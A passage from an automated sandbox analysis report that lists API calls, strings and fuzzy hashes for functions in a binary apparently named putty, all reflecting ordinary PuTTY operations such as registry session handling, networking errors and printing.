                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$Cursor$_strcat$ClassFileLoadLongModuleNameShow_strncpy
                            • String ID: ..\windows\window.c
                            • API String ID: 2777737826-1664963243
                            • Opcode ID: 4009f81d77ccc9d43b3745e67eddd066f12ee0ad4760829e11a4968cc5b8e155
                            • Instruction ID: 17cb79acd1abae785f7d086ca9660add5e376f62eb0ea7cb8d1effa2ecb0fe7a
                            • Opcode Fuzzy Hash: 4009f81d77ccc9d43b3745e67eddd066f12ee0ad4760829e11a4968cc5b8e155
                            • Instruction Fuzzy Hash: FFF0C870508621AFCB105F14FC49A6A7765FF48762F54453BFD05D22A1C7248840D79D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449A31
                            • _strlen.LIBCMT ref: 00449A41
                            • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 00449A63
                            • RegCloseKey.ADVAPI32(?,?,00403989,?), ref: 00449A73
                            Strings
                            • Software\SimonTatham\PuTTY\Sessions, xrefs: 00449A27
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseDeleteOpen_strlen
                            • String ID: Software\SimonTatham\PuTTY\Sessions
                            • API String ID: 708735351-490553574
                            • Opcode ID: e92e533d0a536248dfd4cc6c4f3b1a325c0995f74205660f5da03b7057a86d82
                            • Instruction ID: c0712e5c5b9be1599c1a18693df33d49bb08bbc0d18ea949d709b1c9d4e76d78
                            • Opcode Fuzzy Hash: e92e533d0a536248dfd4cc6c4f3b1a325c0995f74205660f5da03b7057a86d82
                            • Instruction Fuzzy Hash: E1F09032504208BBDB15ABA1FC0AD9F3BA9EF04764B20007AF905A51A2DF758F80969C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WSAAsyncSelect.WS2_32(?,00000000,00000000,00000000), ref: 0043D7A3
                            • WSAGetLastError.WS2_32 ref: 0043D7AE
                            Strings
                            • WSAAsyncSelect(): unknown error, xrefs: 0043D7BB
                            • Network is down, xrefs: 0043D7C1
                            • do_select(): internal error (hwnd==NULL), xrefs: 0043D796
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AsyncErrorLastSelect
                            • String ID: Network is down$WSAAsyncSelect(): unknown error$do_select(): internal error (hwnd==NULL)
                            • API String ID: 1263927367-3348130660
                            • Opcode ID: 38b157c1a116adf9fb1fec2082fec66a4bf0d223fdc2c75a45d4591434be1985
                            • Instruction ID: d8ad936112f6afae7105f0503abe192df5ac8d34cc654d8f36d5eb27c52fe9e0
                            • Opcode Fuzzy Hash: 38b157c1a116adf9fb1fec2082fec66a4bf0d223fdc2c75a45d4591434be1985
                            • Instruction Fuzzy Hash: C0E09B74A142015BD7184A34AC496372656E7C4711FD4D536B115C13E0EB3CCCC4991D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(mscoree.dll,0044EF2D,00454B9B,?,0044EF4D,00000000), ref: 0044EDD9
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044EDE9
                            • ExitProcess.KERNEL32 ref: 0044EDFD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressExitHandleModuleProcProcess
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 75539706-1276376045
                            • Opcode ID: 2aa5d976c6fda9b7bce11038137cf45bcf6b130724ac856ab0121fbbcf0976c6
                            • Instruction ID: dda5de48f8a4bc4c0cff22cee8a3fcdd34bb1cf4ce5ef44a27345f33f6b1cdf6
                            • Opcode Fuzzy Hash: 2aa5d976c6fda9b7bce11038137cf45bcf6b130724ac856ab0121fbbcf0976c6
                            • Instruction Fuzzy Hash: 10D0C974A08313AFEA111BA1AD09A1A3A69FF80B06F0088B5B409D0163DF78C8009A69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004512C1,?), ref: 00455C3D
                            • InterlockedExchange.KERNEL32(00477430,00000001), ref: 00455CBB
                            • InterlockedExchange.KERNEL32(00477430,00000000), ref: 00455D20
                            • InterlockedExchange.KERNEL32(00477430,00000001), ref: 00455D44
                            • InterlockedExchange.KERNEL32(00477430,00000000), ref: 00455DA4
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ExchangeInterlocked$QueryVirtual
                            • String ID:
                            • API String ID: 2947987494-0
                            • Opcode ID: 051651005655a7c13f4474d182efc1014cd8deb04fde503e0deb2f89dd655e46
                            • Instruction ID: 18c739147445028ae4d30d60d493b995b745f2355266f19a644ac7e97f876dcb
                            • Opcode Fuzzy Hash: 051651005655a7c13f4474d182efc1014cd8deb04fde503e0deb2f89dd655e46
                            • Instruction Fuzzy Hash: B451B632A04F058BDB258F18D8E877A73B1EB41716F64816BDC4597293D378D88EC64C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00470420,00000060), ref: 0044F198
                            • GetCommandLineA.KERNEL32(?,00470420,00000060), ref: 0044F231
                            • GetStartupInfoA.KERNEL32(?), ref: 0044F285
                            • __wincmdln.LIBCMT ref: 0044F28B
                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0044F2A8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: HandleModule$CommandInfoLineStartup__wincmdln
                            • String ID:
                            • API String ID: 2870838941-0
                            • Opcode ID: d6836be353f953c79a9b8cd88fc15819399bf84dbd2c82b5385bc477fdfcd308
                            • Instruction ID: 0a8bd9fb1c33788d225a06372ca46041879257b4a051bf902819ce09cc31220d
                            • Opcode Fuzzy Hash: d6836be353f953c79a9b8cd88fc15819399bf84dbd2c82b5385bc477fdfcd308
                            • Instruction Fuzzy Hash: 50319571D04225DAEB21BF72DC0566E3664BF00319F20447FF814AA192EA7D8D8ACB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GlobalLock.KERNEL32(?), ref: 004400CC
                            • _strlen.LIBCMT ref: 00440136
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000), ref: 00440147
                            • _strlen.LIBCMT ref: 0044015F
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 0044016C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_strlen$GlobalLock
                            • String ID:
                            • API String ID: 2105387149-0
                            • Opcode ID: 7787a1b81202c22d7a5c3b7b47c75ae0fbfda7ac0f1d3e28bcc322be8a4afdbf
                            • Instruction ID: c64b9d966343ca014ab9334fa9ace9488012161187604ae350c8199647293955
                            • Opcode Fuzzy Hash: 7787a1b81202c22d7a5c3b7b47c75ae0fbfda7ac0f1d3e28bcc322be8a4afdbf
                            • Instruction Fuzzy Hash: E121FF72510204BEE7306B25EC48C3B7BADEF84364310403BFA49C72A1DB794C928BAC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0044AF9B
                            • GetSaveFileNameA.COMDLG32(?,?,?,00000000), ref: 0044AFCE
                            • GetOpenFileNameA.COMDLG32(?,?,?,00000000), ref: 0044AFD6
                            • GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 0044AFE5
                            • SetCurrentDirectoryA.KERNEL32(?), ref: 0044B002
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FileName$OpenSave
                            • String ID:
                            • API String ID: 3193246104-0
                            • Opcode ID: d06b8eed592a4a0892e4a6aa63559899b34aaca01c875f3ea3a23466168c8ac2
                            • Instruction ID: 1ca0749e5df5781574c032804fdddd7d376c287da75d1ded800feaa2e1400659
                            • Opcode Fuzzy Hash: d06b8eed592a4a0892e4a6aa63559899b34aaca01c875f3ea3a23466168c8ac2
                            • Instruction Fuzzy Hash: 9C114CB02002199BFF219F65DC84BAB77A8AB01355F044077E90586280C7B8DD59CBAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenPrinterA.WINSPOOL.DRV(?,00000000,00000000), ref: 00448D71
                            • StartDocPrinterA.WINSPOOL.DRV(00000000,00000001,?,?,00000000,00000000), ref: 00448D94
                            • StartPagePrinter.WINSPOOL.DRV(00000000,00000000,00000001,?,?,00000000,00000000), ref: 00448D9F
                            • EndDocPrinter.WINSPOOL.DRV(00000000,00000000,00000000,00000001,?,?,00000000,00000000), ref: 00448DAA
                            • ClosePrinter.WINSPOOL.DRV(00000000,?,00000000,00000000), ref: 00448DB6
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Printer.$PrinterStart$CloseOpenPage
                            • String ID:
                            • API String ID: 3064761797-0
                            • Opcode ID: 17efe211c21e8e27d5b3a4a0966b14223409c99fc88242cae39085ce730475a4
                            • Instruction ID: 7ab734fc1e29edb078eb04d9de3b90ffe191962f415dd14d0552d83495b2103c
                            • Opcode Fuzzy Hash: 17efe211c21e8e27d5b3a4a0966b14223409c99fc88242cae39085ce730475a4
                            • Instruction Fuzzy Hash: E801A771E01204B6FB606F628C02B9E76E89F10398F24446FFD40A51D1EFB9C940C65C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00454A09
                            • GetCurrentProcessId.KERNEL32 ref: 00454A15
                            • GetCurrentThreadId.KERNEL32 ref: 00454A1D
                            • GetTickCount.KERNEL32 ref: 00454A25
                            • QueryPerformanceCounter.KERNEL32(?), ref: 00454A31
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                            • String ID:
                            • API String ID: 1445889803-0
                            • Opcode ID: c8f76be6222b952586c7f21c4935fdb1146f2b9f5f7c739736ef38f375e5f868
                            • Instruction ID: 144437b6cf91993cb75fc3473a5fa186c3870e1ca2f05d2f0fdddc924e2b987c
                            • Opcode Fuzzy Hash: c8f76be6222b952586c7f21c4935fdb1146f2b9f5f7c739736ef38f375e5f868
                            • Instruction Fuzzy Hash: ACF0FF76C402159BCF109FF4ED4859EB7F8BB18346B810971F815EB222E734EE408A99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen_wctomb_s
                            • String ID: %H%M%S$&
                            • API String ID: 460730607-2392927110
                            • Opcode ID: d75d4151646ba046e9dfc78db5408f77b4ad3bba1b983f1b7975a0b9aa852e73
                            • Instruction ID: a76c4589fcf225aa19bbc2802b3de2c11d0abea2a9fe968d60428d6f526c22da
                            • Opcode Fuzzy Hash: d75d4151646ba046e9dfc78db5408f77b4ad3bba1b983f1b7975a0b9aa852e73
                            • Instruction Fuzzy Hash: 16410471C04248ABDF119F988881BEEBBB5EF14304F28056FF880B62C2DB785A41D79D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: * VShell$*wildcard == '*'$..\wildcard.c
                            • API String ID: 4218353326-3122237257
                            • Opcode ID: 7fdad7de492d9a904f8bf3ed01f2a1dda50bf2beb30d6d7ab8266590eaa2a4c9
                            • Instruction ID: 437080bf39f59583a646ef6ab90aeb7dd78b46f1fe6338e6b56b71e33877e597
                            • Opcode Fuzzy Hash: 7fdad7de492d9a904f8bf3ed01f2a1dda50bf2beb30d6d7ab8266590eaa2a4c9
                            • Instruction Fuzzy Hash: 3731B371504348BEDB118E64C4417DABBE8AB09354F18905FFC599B241EF38EA818B99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0043F60F: _strlen.LIBCMT ref: 0043F623
                              • Part of subcall function 0043F60F: _strcat.LIBCMT ref: 0043F637
                              • Part of subcall function 0043F60F: IsIconic.USER32(?), ref: 0043F656
                              • Part of subcall function 0043F60F: SetWindowTextA.USER32(?), ref: 0043F667
                              • Part of subcall function 0043F5AF: _strlen.LIBCMT ref: 0043F5C3
                              • Part of subcall function 0043F5AF: _strcat.LIBCMT ref: 0043F5D7
                              • Part of subcall function 0043F5AF: IsIconic.USER32(?), ref: 0043F5F6
                              • Part of subcall function 0043F5AF: SetWindowTextA.USER32(?,?), ref: 0043F607
                            • DeleteMenu.USER32(00474DCC,00000040,00000000), ref: 004407B3
                            • InsertMenuA.USER32(00474DCC,00000030,00000000,00000040,&Restart Session), ref: 004407C5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: IconicMenuTextWindow_strcat_strlen$DeleteInsert
                            • String ID: %.70s (inactive)$&Restart Session
                            • API String ID: 2110450105-504084663
                            • Opcode ID: 87b1103a9dac7caeb38ac150135e2a42b94e2da0bff695a4d9e7f22751c9f517
                            • Instruction ID: 1ae2d56a248df0375c8fb19da0c87c346256b5a23a6e2f6cf75a812393a68ae2
                            • Opcode Fuzzy Hash: 87b1103a9dac7caeb38ac150135e2a42b94e2da0bff695a4d9e7f22751c9f517
                            • Instruction Fuzzy Hash: ED11C1B1900304BFE710AF65ECC6E1A3BACEB84349B50003AF64C97162C778A894CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetPaletteEntries.GDI32(?,00000000,00000106,-00000004), ref: 0043F83C
                            • RealizePalette.GDI32(00000000), ref: 0043F84F
                            • InvalidateRect.USER32(00000000,00000001,?,?,?,004365EE,?), ref: 0043F868
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Palette$EntriesInvalidateRealizeRect
                            • String ID: MG
                            • API String ID: 3902011370-1230926311
                            • Opcode ID: 9e76dd6e80a15470e09a3d9720cc31ded5ffd23f8a0f2ed47ae57a53c0f291b6
                            • Instruction ID: 1bbb289a681de37d872230c9179721e3b8193c9104355f883501b3a8bb96af97
                            • Opcode Fuzzy Hash: 9e76dd6e80a15470e09a3d9720cc31ded5ffd23f8a0f2ed47ae57a53c0f291b6
                            • Instruction Fuzzy Hash: 0111382280C7C05EE3154B35AC98B95BFA69F9A315F19C1FAE5894B3A2C7AA4009C318
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 0043B247
                            • SendDlgItemMessageA.USER32(?,?,00000151,00000000,?), ref: 0043B257
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B1F3
                            • c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 0043B1F8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                            • API String ID: 3015471070-3468507388
                            • Opcode ID: d7fd7252175438cc0318d8f152ed1a3abd819aa2ba3e91cb7950fbf9208504bb
                            • Instruction ID: f37d39dc1f9ec13764e6d0f0d2845224edecd067f17e222eca1d256845095901
                            • Opcode Fuzzy Hash: d7fd7252175438cc0318d8f152ed1a3abd819aa2ba3e91cb7950fbf9208504bb
                            • Instruction Fuzzy Hash: 5E118CB1600104AFEF209E44DCC0E6B776AFB49354F11916BFA198B220C7399D50CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: ..\windows\winnet.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
                            • API String ID: 2009864989-3201592796
                            • Opcode ID: 66a33fbd5de952709c23a8f622c9aa41f5749d73c51408ccc3ca3429cdca60e8
                            • Instruction ID: 0ab2d3de31b3bbd14c688a99d208fd933f99c4f695b7087d890053f229a79182
                            • Opcode Fuzzy Hash: 66a33fbd5de952709c23a8f622c9aa41f5749d73c51408ccc3ca3429cdca60e8
                            • Instruction Fuzzy Hash: 2001DB31A487119BFF28962CDC45D1A33A29B5032072B885FE00156651E76CE882864E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsDlgButtonChecked.USER32(?,?), ref: 0043AF91
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                             • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonChecked
                            • String ID: !"No radio button was checked?!"$..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_RADIO
                            • API String ID: 1719414920-1897624
                            • Opcode ID: 2fbeda967dd03708850fb25ceb80add29a75892d05b8c2bdeb71c7a13f1b6515
                            • Instruction ID: 4307d8de60f35bc9c125d62655d8905c7bf9af90a5db953e1aac1184263635f1
                            • Opcode Fuzzy Hash: 2fbeda967dd03708850fb25ceb80add29a75892d05b8c2bdeb71c7a13f1b6515
